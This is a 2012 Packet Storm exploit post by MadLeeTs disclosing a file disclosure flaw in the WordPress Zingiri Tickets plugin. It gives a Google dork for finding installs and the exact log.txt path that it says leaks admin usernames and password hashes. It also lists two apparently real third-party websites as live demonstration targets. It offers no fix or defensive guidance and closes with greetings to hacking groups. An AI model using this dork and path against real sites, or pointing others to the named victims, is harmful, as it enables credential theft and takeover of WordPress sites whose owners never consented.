WordPress Zingiri Tickets File Disclosure

2012-04-16T00:00:00
ID PACKETSTORM:111904
Type packetstorm
Reporter MadLeeTs
Modified 2012-04-16T00:00:00

Description

                                        
                                            `##########################################################################  
# Title : WordPress Plugin Zingiri Tickets #  
# Author: MadLeeTs #  
# Greets: Shadow008,1337,Invectus,pSyCh0_3D,KhanTastiC,MadBuGz,H4x0rL1f3 #  
# Vendor: http://www.zingiri.com/plugins-and-addons/tickets/ #  
# Email : h4x0rl1f3@gmail.com WwW.MadLeeTs.CoM  
<http://www.madleets.com/>  
#  
# Date : 17/04/2012 #  
# Dork : "/wp-content/plugins/zingiri-tickets" #  
# Category : PHP [Local File Disclosure] #  
# Tested on: [Windows 7, Linux Ubuntu] #  
##########################################################################  
Exploit  
This vulnerbility affects very high because it shows you Admin username  
and password hashes.  
[localhost]/[path]/wp-content/plugins/zingiri-tickets/log.txt  
Demo 1  
http://www.hms69.com/wp-content/plugins/zingiri-tickets/log.txt  
Demo 2  
http://www.ranahost.com/wp-content/plugins/zingiri-tickets/log.txt  
Regards to www.cyberarmy.com.pk & www.c0d3rz.com  
##########################################################################  
`